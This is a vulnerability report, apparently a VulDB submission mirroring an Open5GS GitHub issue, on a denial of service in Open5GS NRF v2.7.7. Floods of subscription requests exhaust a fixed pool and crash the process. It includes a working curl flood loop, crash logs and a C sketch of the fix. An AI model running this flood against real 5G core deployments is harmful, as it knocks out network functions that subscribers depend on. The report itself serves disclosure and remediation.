Submit #817029: Open5GS NRF v2.7.7 Denial of Service

Title: Open5GS NRF v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

NRF aborts when repeated valid `POST /nnrf-nfm/v1/subscriptions` requests exhaust the fixed `subscription_data_pool`.

The server-side subscription creation path does:

```c
subscription_data = ogs_sbi_subscription_data_add();
```

and `ogs_sbi_subscription_data_add()` is implemented as:

```c
ogs_pool_alloc(&subscription_data_pool, &subscription_data);
ogs_assert(subscription_data);
```

So once the pool is full, NRF does not return a normal exhaustion error. It asserts and the whole process exits.

Pool sizing comes from:

```c
ogs_app()->pool.subscription = global_conf.max.peer * 16;
```

with the default:

```c
#define MAX_NUM_OF_PEER 64
```

which yields a fixed pool of 1024 subscription slots before accounting for already-present internal subscriptions in a live deployment.

### Root Cause

- Entry route: `POST /nnrf-nfm/v1/subscriptions`
- Exact crash site: `../lib/sbi/context.c:2758`
- Root cause family: resource exhaustion leading to assertion abort
- Controlling factor: number of created subscription objects

### Steps to Reproduce

1. Confirm a normal control request succeeds:

```bash
curl --http2-prior-knowledge -sS -i -m 8 \
  -X POST 'http://10.33.33.3/nnrf-nfm/v1/subscriptions' \
  -H 'content-type: application/json' \
  --data '{"nfStatusNotificationUri":"http://10.33.33.1:9999/cb","reqNfType":"AMF","subscrCond":{"nfType":"UDM"}}'
```

In my live run, the control response was:

```text
HTTP/2 201
```

2. Flood NRF with valid unique subscription requests until the pool is exhausted:

```bash
i=0
while [ $i -lt 1400 ]; do
  i=$((i+1))
  payload=$(printf \
    '{"nfStatusNotificationUri":"http://10.33.33.1:9999/cb/%d","reqNfType":"AMF","reqNfInstanceId":"flood-%d","subscrCond":{"nfType":"UDM"}}' \
    "$i" "$i")
  curl --http2-prior-knowledge -sS -m 3 \
    -X POST 'http://10.33.33.3/nnrf-nfm/v1/subscriptions' \
    -H 'content-type: application/json' \
    --data "$payload" >/dev/null || break
done
echo "$i"
```

In my live run, the flood failed at request `1003`.

3. Inspect the crash:

```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}} {{.RestartCount}}' nrf
docker logs --since 2026-04-11T11:47:46Z nrf
```

### Logs

```shell
Control response:
HTTP/2 201

Flood result:
fail_at=1003 sent=1003

Container state:
exited 139 2026-04-11T11:48:07.90528137Z 0

NRF logs:
04/11 11:48:07.812: [nrf] INFO: [4ec87c20-359c-41f1-81d2-5fcf356115a1] Subscription created until 2026-04-12T11:48:07.812847+00:00 [duration:86400000000,validity:86400.000000] (../src/nrf/nnrf-handler.c:633)
04/11 11:48:07.817: [sbi] FATAL: ogs_sbi_subscription_data_add: Assertion `subscription_data' failed. (../lib/sbi/context.c:2758)
```

### Expected behaviour

NRF should reject excessive subscription creation with a normal HTTP error such as `429`, `503`, or `507`, and remain running.

### Observed Behaviour

Repeated valid subscription requests exhaust the fixed pool and terminate the NRF process with exit code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
Source: https://github.com/open5gs/open5gs/issues/4465
User: ZiyuLin (UID 93568)
Submission: 01.05.2026 10:31 (1 month ago)
Moderation: 16.05.2026 14:38 (15 days later)
Status: Accepted
VulDB Entry: 364331 [Open5GS up to 2.7.7 NRF /lib/sbi/context.c Denial of Service]
Points: 20
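
The behaviour the report lists under "Expected behaviour", as an added C sketch that is not part of the submission and is not Open5GS code: a fixed pool whose allocator returns NULL on exhaustion, and a handler that turns that into a `503` so the process keeps running. All names (`sub_alloc`, `sub_free`, `handle_create_subscription`, `create_n`) and the callback URL are hypothetical; the pool size is the 64 * 16 default quoted in the report.

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed stand-in for a fixed object pool; not Open5GS code. */
#define POOL_SIZE 1024 /* 64 peers * 16, the default sizing quoted in the report */
typedef struct { int in_use; char notify_uri[128]; } sub_t;
static sub_t pool[POOL_SIZE];

/* Returns a free slot, or NULL on exhaustion instead of asserting. */
sub_t *sub_alloc(void)
{
    for (size_t i = 0; i < POOL_SIZE; i++) {
        if (!pool[i].in_use) {
            pool[i].in_use = 1;
            return &pool[i];
        }
    }
    return NULL;
}

/* Releases a slot, e.g. on unsubscribe or validity expiry. */
void sub_free(sub_t *s) { if (s) s->in_use = 0; }

/* Hypothetical handler: allocation failure becomes an HTTP status. */
int handle_create_subscription(const char *uri, sub_t **out)
{
    *out = sub_alloc();
    if (*out == NULL)
        return 503; /* pool full: reject this request, stay alive */
    snprintf((*out)->notify_uri, sizeof((*out)->notify_uri), "%s", uri);
    return 201;
}

/* Sends n create requests; returns how many were accepted with 201. */
int create_n(int n)
{
    int accepted = 0;
    sub_t *s;
    for (int i = 0; i < n; i++)
        if (handle_create_subscription("http://callback.example/cb", &s) == 201)
            accepted++;
    return accepted;
}

int main(void)
{
    sub_t *s;
    printf("accepted %d of 1400\n", create_n(1400));
    printf("next status: %d\n", handle_create_subscription("http://callback.example/cb", &s));
    return 0;
}
```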
